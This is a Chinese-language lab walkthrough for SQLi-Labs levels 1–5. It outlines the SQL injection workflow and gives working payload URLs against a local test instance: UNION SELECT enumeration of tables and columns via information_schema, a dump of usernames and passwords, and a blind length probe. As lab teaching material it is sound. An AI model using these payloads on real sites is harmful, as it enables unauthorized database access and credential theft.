SQLi-Labs--Page-1 (Basic Injections)
SQL注入流程:
- 判断是否存在注入点
- 判断查询字段数(order by)
- 判断回显点(union select)
- 查询(当前)数据库
- 查询数据库中的表
- 查询字段名
- 获取表中数据
Less-1:单引号闭合(字符型)
单引号闭合,进行注释,页面回显正常
and 1=1/and 1=2
判断注入点
判断字段数order by
union select
联合查询判断回显点
查询数据库,当前用户
查询数据表http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe
查询users
表中字段http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- qwe
获取字段数据http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,username,password from users limit 1,1 -- qwe
Less2:数字型
判断存在注入
后续操作与Less-1
相同,不在叙述。
Less-3:单引号+括号
单引号和括号闭合,注释,页面回显正常
and 1=1/and 1=2
判断注入点,存在注入
Less4:双引号+括号
双引号+口号闭合,注释,页面回显正常。
判断注入点
Less5:单引号(盲注)
单引号闭合,注释,根据页面返回正确与否,判断注入点。
判断数据库名的长度,页面返回正常,数据库名长度为8http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 -- qwe